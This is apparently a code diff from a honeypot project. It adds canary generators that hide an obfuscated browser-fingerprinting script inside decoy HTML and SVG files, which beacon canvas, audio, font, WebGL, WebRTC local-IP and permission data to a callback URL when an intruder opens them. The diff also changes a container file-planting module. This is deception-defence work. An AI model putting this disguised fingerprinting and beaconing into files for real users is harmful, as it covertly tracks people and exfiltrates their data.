hc: navigator.hardwareConcurrency,
dm: navigator.deviceMemory || null,
tp: navigator.maxTouchPoints,
wd: navigator.webdriver === true,
pdf: navigator.pdfViewerEnabled || null,
};
} catch (e) { fp.nav = { err: String(e) }; }
// screen
try {
fp.scr = {
w: screen.width, h: screen.height,
aw: screen.availWidth, ah: screen.availHeight,
cd: screen.colorDepth, pd: screen.pixelDepth,
dpr: window.devicePixelRatio,
iw: window.innerWidth, ih: window.innerHeight,
or: (screen.orientation && screen.orientation.type) || null,
};
} catch (e) { fp.scr = { err: String(e) }; }
// tz / locale
try {
var dtf = Intl.DateTimeFormat().resolvedOptions();
fp.tz = {
z: dtf.timeZone, lc: dtf.locale,
ca: dtf.calendar, ns: dtf.numberingSystem,
off: new Date().getTimezoneOffset(),
};
} catch (e) { fp.tz = { err: String(e) }; }
// connection
try {
var c = navigator.connection;
fp.cn = c ? {
t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
} : null;
} catch (e) { fp.cn = { err: String(e) }; }
// canvas
try {
var cv = document.createElement("canvas");
cv.width = 280; cv.height = 60;
var ctx = cv.getContext("2d");
ctx.textBaseline = "top";
ctx.font = "14px Arial";
ctx.fillStyle = "#f60";
ctx.fillRect(125, 1, 62, 20);
ctx.fillStyle = "#069";
ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
ctx.fillStyle = "rgba(102,204,0,0.7)";
ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
var dataURL = cv.toDataURL();
fp.cv = { h: await sha256(dataURL), n: dataURL.length };
} catch (e) { fp.cv = { err: String(e) }; }
// webgl
try {
var gc = document.createElement("canvas");
var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
if (gl) {
var ext = gl.getExtension("WEBGL_debug_renderer_info");
fp.gl = {
v: gl.getParameter(gl.VENDOR),
r: gl.getParameter(gl.RENDERER),
ver: gl.getParameter(gl.VERSION),
sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
};
} else { fp.gl = { err: "unavailable" }; }
} catch (e) { fp.gl = { err: String(e) }; }
// audio
try {
var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
if (ACtx) {
var actx = new ACtx(1, 44100, 44100);
var osc = actx.createOscillator();
var cmp = actx.createDynamicsCompressor();
osc.type = "triangle"; osc.frequency.value = 10000;
cmp.threshold.value = -50; cmp.knee.value = 40;
cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
osc.connect(cmp); cmp.connect(actx.destination);
osc.start(0);
var buf = await actx.startRendering();
var data = buf.getChannelData(0).slice(4500, 5000);
var sum = 0;
for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
} else { fp.au = { err: "unavailable" }; }
} catch (e) { fp.au = { err: String(e) }; }
// fonts
try {
var bases = ["monospace", "sans-serif", "serif"];
var tests = [
"Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
"Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
"Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
"JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
"Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
"San Francisco", "Helvetica Neue", "Lucida Grande",
"DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
"Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
"Noto Sans", "Noto Mono",
"Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
"Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
"Malgun Gothic", "Noto Sans CJK",
"Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
"Bahnschrift", "Cyberpunk",
];
var sp = document.createElement("span");
sp.style.fontSize = "72px";
sp.style.position = "absolute";
sp.style.left = "-9999px";
sp.innerHTML = "mmmmmmmmmmlli";
document.body.appendChild(sp);
var bs = {};
for (var bi = 0; bi < bases.length; bi++) {
sp.style.fontFamily = bases[bi];
bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
}
var det = [];
for (var ti = 0; ti < tests.length; ti++) {
for (var bj = 0; bj < bases.length; bj++) {
sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
if (sp.offsetWidth !== bs[bases[bj]].w ||
sp.offsetHeight !== bs[bases[bj]].h) {
det.push(tests[ti]); break;
}
}
}
document.body.removeChild(sp);
fp.ft = {
h: await sha256(det.slice().sort().join(",")),
n: det.length, t: tests.length, d: det,
};
} catch (e) { fp.ft = { err: String(e) }; }
// webrtc local ip leak
try {
var ips = {}; var cands = [];
var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
window.mozRTCPeerConnection;
if (RPC) {
var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
pc.createDataChannel("");
pc.onicecandidate = function (e) {
if (!e.candidate) return;
cands.push(e.candidate.candidate);
var m = e.candidate.candidate.match(
/(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
if (m) ips[m[1]] = 1;
};
var off = await pc.createOffer();
await pc.setLocalDescription(off);
await new Promise(function (r) { setTimeout(r, 1500); });
pc.close();
fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
} else { fp.rtc = { err: "unavailable" }; }
} catch (e) { fp.rtc = { err: String(e) }; }
// battery
try {
if (navigator.getBattery) {
var bat = await navigator.getBattery();
fp.bt = {
c: bat.charging, l: bat.level,
ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
};
} else { fp.bt = { err: "unavailable" }; }
} catch (e) { fp.bt = { err: String(e) }; }
// perf timing jitter
try {
var samples = [];
for (var pi = 0; pi < 1000; pi++) {
var pa = performance.now();
var x = 0;
for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
samples.push(performance.now() - pa);
}
samples.sort(function (a, b) { return a - b; });
fp.pf = {
med: samples[500].toFixed(4),
p95: samples[950].toFixed(4),
mn: samples[0].toFixed(4),
mx: samples[999].toFixed(4),
};
} catch (e) { fp.pf = { err: String(e) }; }
// permissions
try {
if (navigator.permissions) {
var names = ["geolocation", "notifications", "camera", "microphone",
"persistent-storage", "clipboard-read", "clipboard-write"];
var st = {};
for (var ni = 0; ni < names.length; ni++) {
try {
var r = await navigator.permissions.query({ name: names[ni] });
st[names[ni]] = r.state;
} catch (e) { st[names[ni]] = "unsupported"; }
}
fp.pm = st;
} else { fp.pm = { err: "unavailable" }; }
} catch (e) { fp.pm = { err: String(e) }; }
// composite identity hash — stable inputs only
try {
var stable = [
fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
fp.scr && (fp.scr.w + "x" + fp.scr.h),
].filter(Boolean).join("|");
fp.id = await sha256(stable);
} catch (e) { fp.id = { err: String(e) }; }
// 2) ship the payload as base64url JSON on a GET query param.
// The current worker records the hit on /c/<slug>; step-4 worker
// will decode ?d= and persist the fingerprint blob.
try {
var json = JSON.stringify(fp);
var b64 = btoa(unescape(encodeURIComponent(json)))
.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
// chunk if URL would exceed safe limit (~6KB)
var MAX = 6000;
if (b64.length <= MAX) {
fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
} else {
var sid = (Math.random() * 1e9 | 0).toString(36);
var total = Math.ceil(b64.length / MAX);
for (var ci = 0; ci < total; ci++) {
var part = b64.substr(ci * MAX, MAX);
fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
}
}
} catch (e) { /* swallow */ }
})();

View File

@@ -0,0 +1,140 @@
"""HTML fingerprint canary — plausible-looking page with an obfuscated
browser-fingerprinting payload inlined at the bottom of ``<body>``.
The visible content is a deliberately mundane "internal directory"
table — the kind of file a curious attacker pulls off a decky's
filesystem and opens locally to triage. When the file is opened in
*any* network-connected browser the obfuscated payload runs and beacons
to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
timing jitter, permissions, composite identity hash).
Determinism: the mint UUID is derived from the callback token via
:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
output, satisfying the generator contract in :mod:`decnet.canary.base`.
The obfuscator's seed and polymorphic config bits are likewise
callback-token-derived (see :mod:`decnet.canary.obfuscator`).
"""
from __future__ import annotations
import hashlib
import uuid
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
def _mint_uuid_for(callback_token: str) -> str:
return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
def _stable_int(callback_token: str, salt: str = "") -> int:
"""Deterministic non-negative int derived from the callback token.
``builtins.hash`` is salted per-process — useless for a generator
that must be byte-identical across runs. SHA-256 prefix is
overkill but free.
"""
h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
return int.from_bytes(h[:4], "big")
_PAGE_TEMPLATE = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Internal Asset Directory</title>
<style>
body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
margin:24px;font-size:13px}}
h1{{font-size:18px;margin:0 0 4px 0}}
.sub{{color:#777;font-size:11px;margin-bottom:18px}}
table{{border-collapse:collapse;width:100%;background:#fff;
box-shadow:0 1px 2px rgba(0,0,0,.05)}}
th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
th{{background:#f4f4f4;font-weight:600;font-size:11px;
text-transform:uppercase;letter-spacing:.5px;color:#555}}
tr:hover td{{background:#fafbff}}
.foot{{margin-top:16px;color:#999;font-size:11px}}
</style>
</head>
<body>
<h1>Internal Asset Directory</h1>
<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
<table>
<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
{rows}
</table>
<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
<script>{payload}</script>
</body>
</html>
"""
_ROW_POOL = (
("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
)
def _build_rows(callback_token: str) -> tuple[str, int]:
pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
take = 5 + (_stable_int(callback_token, "take") % 4)
selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]
cells = "\n".join(
"<tr>" + "".join(f"<td>{c}</td>" for c in row) + "</tr>"
for row in selected
)
return cells, len(selected)
def _sync_label(callback_token: str) -> str:
day = _stable_int(callback_token, "day") % 28 + 1
hour = _stable_int(callback_token, "hour") % 24
return f"2026-04-{day:02d} {hour:02d}:14 UTC"
class FingerprintHtmlGenerator(CanaryGenerator):
"""Synthesise an HTML page that fingerprints the browser opening it."""
name = "fingerprint_html"
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
mint_uuid = _mint_uuid_for(ctx.callback_token)
nonce = nonce_for(ctx.callback_token, mint_uuid)
payload = render_fingerprint_js(
callback_token=ctx.callback_token,
http_base=ctx.http_base,
mint_uuid=mint_uuid,
nonce=nonce,
)
rows, row_count = _build_rows(ctx.callback_token)
body = _PAGE_TEMPLATE.format(
sync_label=_sync_label(ctx.callback_token),
row_count=row_count,
rows=rows,
payload=payload,
)
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
return CanaryArtifact(
path="",
content=body.encode("utf-8"),
mode=0o644,
mtime_offset=-86400 * 14,
generator=self.name,
fingerprint_nonce=nonce,
notes=[
f"obfuscated fingerprinter beacons={beacon}",
f"mint_uuid={mint_uuid}",
],
)

View File

@@ -0,0 +1,88 @@
"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
that runs the obfuscated fingerprinter when the file is opened directly
in a browser.
SVG ``<script>`` only fires when the SVG is loaded as a top-level
document (or via ``<object>``/``<iframe>``); it's *blocked* when the
SVG is referenced from another page's ``<img>``. That's the right
posture for canary use: an attacker browsing the decky filesystem and
double-clicking a stray ``network_diagram.svg`` triggers it; rendering
inside a sandboxed CMS preview does not.
Same determinism guarantees as :mod:`fingerprint_html`.
"""
from __future__ import annotations
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
<style>
.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
</style>
<text class="title" x="20" y="28">Network Topology — {region} segment</text>
<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
<path class="edge" d="M160 105 L240 105"/>
<path class="edge" d="M360 105 L440 105"/>
<path class="edge" d="M300 130 L300 220"/>
<script type="application/ecmascript"><![CDATA[
{payload}
]]></script>
</svg>
"""
_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
class FingerprintSvgGenerator(CanaryGenerator):
"""Synthesise an SVG that fingerprints the browser opening it."""
name = "fingerprint_svg"
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
mint_uuid = _mint_uuid_for(ctx.callback_token)
nonce = nonce_for(ctx.callback_token, mint_uuid)
payload = render_fingerprint_js(
callback_token=ctx.callback_token,
http_base=ctx.http_base,
mint_uuid=mint_uuid,
nonce=nonce,
)
region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
day = _stable_int(ctx.callback_token, "day") % 28 + 1
body = _DIAGRAM_TEMPLATE.format(
region=region,
ver=ver,
review=f"2026-03-{day:02d}",
payload=payload,
)
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
return CanaryArtifact(
path="",
content=body.encode("utf-8"),
mode=0o644,
mtime_offset=-86400 * 30,
generator=self.name,
fingerprint_nonce=nonce,
notes=[
f"obfuscated fingerprinter beacons={beacon}",
f"mint_uuid={mint_uuid}",
],
)

View File

@@ -43,7 +43,7 @@ class HoneydocPdfGenerator(CanaryGenerator):
def generate(self, ctx: CanaryContext) -> CanaryArtifact: def generate(self, ctx: CanaryContext) -> CanaryArtifact:
try: try:
from pikepdf import Pdf, Name, Dictionary, String # type: ignore[import-not-found] from pikepdf import Pdf, Name, Dictionary, String
except ImportError as e: except ImportError as e:
raise InstrumenterRejectedError( raise InstrumenterRejectedError(
"honeydoc_pdf requires pikepdf; install it (`pip install " "honeydoc_pdf requires pikepdf; install it (`pip install "

View File

@@ -32,7 +32,7 @@ class ImageInstrumenter(CanaryInstrumenter):
self, blob: bytes, ctx: CanaryContext, *, target_path: str, self, blob: bytes, ctx: CanaryContext, *, target_path: str,
) -> CanaryArtifact: ) -> CanaryArtifact:
try: try:
from PIL import Image, PngImagePlugin # type: ignore[import-not-found] from PIL import Image, PngImagePlugin
except ImportError as e: except ImportError as e:
raise InstrumenterRejectedError( raise InstrumenterRejectedError(
"image instrumenter requires Pillow; install it (`pip " "image instrumenter requires Pillow; install it (`pip "

View File

@@ -34,7 +34,7 @@ class PdfInstrumenter(CanaryInstrumenter):
self, blob: bytes, ctx: CanaryContext, *, target_path: str, self, blob: bytes, ctx: CanaryContext, *, target_path: str,
) -> CanaryArtifact: ) -> CanaryArtifact:
try: try:
import pikepdf # type: ignore[import-not-found] import pikepdf
except ImportError as e: except ImportError as e:
raise InstrumenterRejectedError( raise InstrumenterRejectedError(
"PDF instrumenter requires pikepdf; install it (`pip " "PDF instrumenter requires pikepdf; install it (`pip "

177
decnet/canary/obfuscator.py Normal file
View File

@@ -0,0 +1,177 @@
"""Per-mint JS obfuscator wrapper.
Thin Python wrapper around the ``javascript-obfuscator`` Node package.
Used by the fingerprint generators / instrumenters to produce a unique,
hard-to-statically-analyse JS blob per canary mint.
Two design choices flow from the canary contract in :mod:`base`:
* **Determinism.** Generators must return byte-identical artifacts for
the same ``(callback_token, http_base, dns_zone, persona)``. We
derive a numeric seed from the callback token and pass it to the
obfuscator's own ``seed`` option, and we derive the polymorphic
config bits from the same hash so a re-mint reproduces exactly.
* **Per-mint uniqueness.** Two different callback tokens produce
structurally different output: different identifier names, different
string-array rotation, optionally different transforms enabled.
The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
We pass code+options as JSON on stdin and read the obfuscated result
from stdout. Stderr surfaces obfuscator failures.
"""
from __future__ import annotations
import hashlib
import hmac
import json
import os
import subprocess # nosec B404 — Node helper exec is the whole point
from pathlib import Path
from typing import Any
_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
# specific runtime; default to PATH lookup.
_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
# Hard timeout for the obfuscator subprocess. Real runs on the
# fingerprint payload sit well under 5s on a dev box.
_TIMEOUT_S = 30
class ObfuscatorError(RuntimeError):
"""Raised when the Node helper fails or returns empty output."""
class FingerprintSecretMissing(RuntimeError):
"""Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset.
Fingerprint canaries embed a per-mint nonce derived from this
server-side secret; without it the worker cannot validate incoming
fingerprint beacons, so we fail loud at mint time rather than ship
a defeatable canary.
"""
_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET" # nosec B105 — this is an env var name, not a hardcoded password
def nonce_for(callback_token: str, mint_uuid: str) -> str:
"""Compute the per-mint fingerprint nonce.
HMAC-SHA256 keyed on the server-side master secret, message is
``callback_token + "|" + mint_uuid``. Truncated to 16 hex chars
(~64 bits of entropy) — enough to defeat slug-only forgery while
fitting comfortably into a query string.
"""
secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
if not secret:
raise FingerprintSecretMissing(
f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
)
msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16]
def _seed_from_token(callback_token: str) -> int:
"""Derive a 31-bit numeric seed from the callback token.
``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
using a SHA-256-derived prefix gives us a uniform distribution
across the 31-bit positive range.
"""
h = hashlib.sha256(callback_token.encode("utf-8")).digest()
return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
def _config_from_seed(seed: int) -> dict[str, Any]:
"""Build a deterministic, per-mint obfuscator config.
The hash bits drive *which* transforms apply — two mints get
structurally different outputs, not just different identifier names.
Defaults stay aggressive enough that reverse engineering is real
work; we never disable string-array or rename, only vary the dial.
"""
bits = seed
encodings = ("base64", "rc4")
string_array_encoding = [encodings[bits & 1]]
control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0
dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7
transform_object_keys = bool((bits >> 17) & 1)
numbers_to_expressions = bool((bits >> 18) & 1)
simplify = bool((bits >> 19) & 1)
return {
"compact": True,
"seed": seed,
"controlFlowFlattening": True,
"controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
"deadCodeInjection": True,
"deadCodeInjectionThreshold": round(dead_code_threshold, 3),
"stringArray": True,
"stringArrayEncoding": string_array_encoding,
"stringArrayThreshold": 1,
"stringArrayRotate": True,
"stringArrayShuffle": True,
"splitStrings": True,
"splitStringsChunkLength": 4 + (bits & 7),
"transformObjectKeys": transform_object_keys,
"numbersToExpressions": numbers_to_expressions,
"simplify": simplify,
"selfDefending": False, # breaks SVG embed; not worth the cost
"renameGlobals": False,
"identifierNamesGenerator": "mangled-shuffled",
}
def obfuscate(code: str, *, callback_token: str) -> str:
"""Obfuscate *code* deterministically per *callback_token*.
Raises :class:`ObfuscatorError` if Node fails or returns empty.
"""
seed = _seed_from_token(callback_token)
options = _config_from_seed(seed)
payload = json.dumps({"code": code, "options": options})
try:
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
[_NODE_BIN, str(_HELPER)],
input=payload, capture_output=True, text=True,
timeout=_TIMEOUT_S, check=False,
)
except FileNotFoundError as e:
raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
except subprocess.TimeoutExpired as e:
raise ObfuscatorError("javascript-obfuscator timed out") from e
if proc.returncode != 0:
raise ObfuscatorError(
f"javascript-obfuscator failed rc={proc.returncode} "
f"stderr={proc.stderr.strip()[:400]}"
)
out = proc.stdout
if not out.strip():
raise ObfuscatorError("javascript-obfuscator returned empty output")
return out
def render_fingerprint_js(
*, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
) -> str:
"""Build the obfuscated fingerprint JS for a single mint.
Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and
``{{MINT_NONCE}}`` in the payload template, then runs it through
:func:`obfuscate` with a seed derived from the callback token.
The nonce is appended as ``&k=`` on every beacon URL the JS emits;
the worker rejects fingerprint payloads whose ``?k=`` doesn't match
the row's :attr:`CanaryToken.fingerprint_nonce`.
"""
template = _PAYLOAD.read_text(encoding="utf-8")
beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
src = (
template
.replace("{{BEACON_URL}}", beacon)
.replace("{{MINT_UUID}}", mint_uuid)
.replace("{{MINT_NONCE}}", nonce)
)
return obfuscate(src, callback_token=callback_token)

View File

@@ -0,0 +1,10 @@
{
"name": "decnet-canary-obfuscator",
"version": "0.1.0",
"private": true,
"description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
"main": "_obfuscate_helper.js",
"dependencies": {
"javascript-obfuscator": "^5.4.2"
}
}

View File

@@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = {
"honeydoc": "/home/{user}/Documents/quarterly_report.html", "honeydoc": "/home/{user}/Documents/quarterly_report.html",
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx", "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf", "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
} }
_WINDOWS_DEFAULTS: dict[str, str] = { _WINDOWS_DEFAULTS: dict[str, str] = {
@@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
"honeydoc": "/home/{user}/Documents/quarterly_report.html", "honeydoc": "/home/{user}/Documents/quarterly_report.html",
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx", "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf", "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
} }

View File

@@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire.
""" """
from __future__ import annotations from __future__ import annotations
import asyncio
import base64
import os import os
import shlex from datetime import datetime, timedelta, timezone
import time
from secrets import token_urlsafe from secrets import token_urlsafe
from typing import Any, Iterable, Optional from typing import Any, Iterable, Optional
@@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus
from decnet.canary.base import CanaryArtifact, CanaryContext from decnet.canary.base import CanaryArtifact, CanaryContext
from decnet.canary.factory import get_generator from decnet.canary.factory import get_generator
from decnet.canary.paths import default_path_for from decnet.canary.paths import default_path_for
from decnet.decky_io import (
delete_file_from_container,
resolve_topology_container,
write_file_to_container,
)
from decnet.logging import get_logger from decnet.logging import get_logger
from decnet.web.db.repository import BaseRepository from decnet.web.db.repository import BaseRepository
log = get_logger("canary.planter") log = get_logger("canary.planter")
_DOCKER = "docker"
_TIMEOUT = 8.0
# Container suffix — matches the orchestrator SSH driver's convention # Container suffix — matches the orchestrator SSH driver's convention
# (``<decky_name>-ssh``). Canary placement always happens through the # (``<decky_name>-ssh``). Canary placement always happens through the
# ssh container because every decky has one and it carries the most # ssh container because every decky has one and it carries the most
@@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str:
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}" return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
def _dirname(path: str) -> str: # resolve_topology_container is re-exported from decky_io for back-compat
idx = path.rfind("/") # with callers (tests, deploy hook) that imported it from this module
if idx <= 0: # before the decky_io extraction.
return "/" __all__ = [
return path[:idx] "plant",
"revoke",
"resolve_topology_container",
async def _run( "seed_baseline",
argv: list[str], *, stdin_bytes: Optional[bytes] = None, "seed_baseline_topology",
) -> tuple[int, str, str]: ]
try:
proc = await asyncio.create_subprocess_exec(
*argv,
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
except FileNotFoundError as exc:
return 127, "", f"argv[0] not found: {exc}"
try:
stdout, stderr = await asyncio.wait_for(
proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
)
except asyncio.TimeoutError:
try:
proc.kill()
except ProcessLookupError:
pass
return 124, "", "timeout"
return (
proc.returncode if proc.returncode is not None else -1,
stdout.decode("utf-8", "replace"),
stderr.decode("utf-8", "replace"),
)
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
"""Compose the ``sh -c`` script + stdin payload for one artifact.
Binary safety: we base64-encode on the host and stream the result
over stdin to ``base64 -d`` inside the container, so the bytes
never touch the argv (kernel ARG_MAX would reject anything larger
than ~128KB-2MB depending on the host). Both ``base64`` (coreutils)
and ``touch -d @<unix_ts>`` are present on every Linux base image
we ship, so there's no per-distro branching.
"""
encoded = base64.b64encode(artifact.content)
mtime = int(time.time() + artifact.mtime_offset)
mode_str = oct(artifact.mode)[2:]
parts = [
f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
f"base64 -d > {shlex.quote(artifact.path)}",
f"chmod {mode_str} {shlex.quote(artifact.path)}",
f"touch -d @{mtime} {shlex.quote(artifact.path)}",
]
return " && ".join(parts), encoded
async def _publish( async def _publish(
@@ -139,6 +93,7 @@ async def plant(
repo: Optional[BaseRepository] = None, repo: Optional[BaseRepository] = None,
publish: bool = True, publish: bool = True,
bus: Optional[BaseBus] = None, bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> tuple[bool, Optional[str]]: ) -> tuple[bool, Optional[str]]:
"""Write *artifact* into the decky's ssh container. """Write *artifact* into the decky's ssh container.
@@ -157,13 +112,12 @@ async def plant(
await repo.update_canary_token_state(token_uuid, "failed", err) await repo.update_canary_token_state(token_uuid, "failed", err)
return False, err return False, err
sh_cmd, stdin_payload = _build_plant_command(artifact) target_container = container or _container_for(decky_name)
# ``-i`` keeps stdin attached so base64 -d inside the container can mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
# consume the encoded payload streamed from the host. success, error = await write_file_to_container(
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd] target_container, artifact.path, artifact.content,
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload) mode=artifact.mode, mtime=mtime,
success = rc == 0 )
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
if repo is not None: if repo is not None:
if success: if success:
@@ -182,8 +136,8 @@ async def plant(
if not success: if not success:
log.warning( log.warning(
"canary.plant failed decky=%s token=%s rc=%d stderr=%r", "canary.plant failed decky=%s token=%s container=%s err=%r",
decky_name, token_uuid, rc, stderr[:120], decky_name, token_uuid, target_container, error,
) )
return success, error return success, error
